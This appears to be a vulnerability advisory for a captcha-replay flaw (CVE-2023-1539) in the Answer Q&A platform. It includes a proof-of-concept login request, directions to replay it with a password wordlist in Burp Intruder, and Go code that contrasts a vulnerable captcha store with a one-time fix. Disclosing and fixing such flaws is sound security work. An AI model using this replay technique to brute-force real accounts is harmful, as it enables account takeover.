CVE-2023-1539: Captcha Bypass on login in answer

Guessable CAPTCHA in GitHub repository answerdev/answer prior to 1.0.6.


Description

After several failed login attempts the login form starts requiring a captcha. Each captcha consists of a "captcha_id" (the identifier of the challenge) and a "captcha_code" (its solution). For example:

"captcha_code":"8awt"
"captcha_id":"7nToXDrT6SkJ2BJxKG1u"

The server never invalidates a challenge once it has been solved: the same captcha_code and captcha_id pair can be submitted with any number of further login attempts and is accepted every time.

The captcha is generated by a request to http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Proof of Concept

Log in with wrong credentials several times until a captcha is issued. Captcha URL: http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Solve the captcha once and submit the code together with a login request.

Your request:

POST /answer/api/v1/user/login/email HTTP/1.1
Host: 34.245.133.152:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 
Content-Type: application/json
Content-Length: 105
Origin: http://34.245.133.152:9080
Connection: close
Referer: http://34.245.133.152:9080/users/login

{"e_mail":"sdad@gmail.com","pass":"sdadssadda","captcha_code":"8awt","captcha_id":"7nToXDrT6SkJ2BJxKG1u"}
----------------------------------------------------------------

Replay this request as many times as you want with the same captcha_code and the same captcha_id; it is never rejected for a stale or already-used captcha.

Response you will get each time:
----------------------------------------------------------------
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Date: Tue, 21 Feb 2023 12:44:12 GMT
Content-Length: 186
Connection: close

{"code":400,"reason":"error.object.email_or_password_incorrect","msg":"Email and password do not match.","data":[{"error_field":"e_mail","error_msg":"Email and password do not match."}]}

You can send the request to Burp Suite Intruder, attach a password wordlist and run 1000 requests. The result is the same for every request: a 400 "Email and password do not match" response rather than a captcha error, so the captcha no longer slows down the password-guessing attack.

Impact

The security measure is to require the user to solve a captcha after multiple failed login attempts. The captcha includes a "captcha_code", which is the code the user must enter to prove they are human, and a "captcha_id", which is a unique identifier for that particular captcha. Once an attacker solves a single captcha, they can reuse the same "captcha_code" and "captcha_id" for all subsequent login attempts, which defeats the purpose of the captcha and allows unthrottled password brute-forcing against any account.
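The replay described in the Proof of Concept and the Impact section comes down to one server-side decision: whether verifying a captcha consumes it. The following is an added example, not code from the Answer project, that models both behaviours with a hypothetical in-memory captcha store. The store with oneTime=false reproduces the vulnerable pattern (the challenge stays valid after verification, so 1000 replays of the same id/code pair all pass), while the store with oneTime=true deletes the challenge on the first verification attempt, right or wrong, so a solved captcha is worth exactly one login attempt and a wrong guess cannot be retried against the same id. The ids, TTL and function names are assumptions for the illustration.

```go
package main

import (
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"sync"
	"time"
)

// captchaStore is a hypothetical in-memory challenge store (not Answer's
// real implementation). oneTime selects the fixed (true) or vulnerable
// (false) verification behaviour.
type captchaStore struct {
	mu      sync.Mutex
	entries map[string]captchaEntry
	oneTime bool
}

type captchaEntry struct {
	code    string
	expires time.Time
}

var errCaptcha = errors.New("captcha invalid, expired or already used")

func newStore(oneTime bool) *captchaStore {
	return &captchaStore{entries: map[string]captchaEntry{}, oneTime: oneTime}
}

// randomID returns an unguessable 120-bit challenge identifier.
func randomID() string {
	b := make([]byte, 15)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return base64.RawURLEncoding.EncodeToString(b)
}

// Issue stores a new challenge whose solution is code and returns its id.
func (s *captchaStore) Issue(code string, ttl time.Duration) string {
	id := randomID()
	s.mu.Lock()
	s.entries[id] = captchaEntry{code: code, expires: time.Now().Add(ttl)}
	s.mu.Unlock()
	return id
}

// Verify checks (id, code). In one-time mode the challenge is removed on the
// first verification attempt regardless of outcome: a wrong guess burns it
// (no brute force of the code) and a right one cannot be replayed.
func (s *captchaStore) Verify(id, code string) error {
	s.mu.Lock()
	defer s.mu.Unlock()
	e, ok := s.entries[id]
	if !ok || time.Now().After(e.expires) {
		delete(s.entries, id)
		return errCaptcha
	}
	if s.oneTime {
		delete(s.entries, id)
	}
	// Vulnerable mode falls through with the entry still stored, so the same
	// pair keeps verifying until the TTL expires.
	if e.code != code {
		return errCaptcha
	}
	return nil
}

// ReplayLogin simulates the attacker's loop: attempts login requests that all
// carry the same captcha pair. It returns how many passed the captcha check.
func ReplayLogin(store *captchaStore, id, code string, attempts int) int {
	passed := 0
	for i := 0; i < attempts; i++ {
		if store.Verify(id, code) == nil {
			passed++
		}
	}
	return passed
}

func main() {
	// Constructed sample: the code "8awt" mirrors the value in the report.
	vuln := newStore(false)
	id := vuln.Issue("8awt", 5*time.Minute)
	fmt.Printf("vulnerable store: %d of 1000 replays passed\n", ReplayLogin(vuln, id, "8awt", 1000))

	fixed := newStore(true)
	id = fixed.Issue("8awt", 5*time.Minute)
	fmt.Printf("one-time store:   %d of 1000 replays passed\n", ReplayLogin(fixed, id, "8awt", 1000))
}
```

Deleting the entry before comparing the code is deliberate: if the store only removed it on a correct answer, the attacker could enumerate the (short) code space against a single id. The expiry check gives the same one-time semantics a bound in time even if the entry is never verified.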

Related news

GHSA-g44v-6qfm-f6ch: Answer has Guessable CAPTCHA

Guessable CAPTCHA in GitHub repository answerdev/answer prior to 1.0.6.
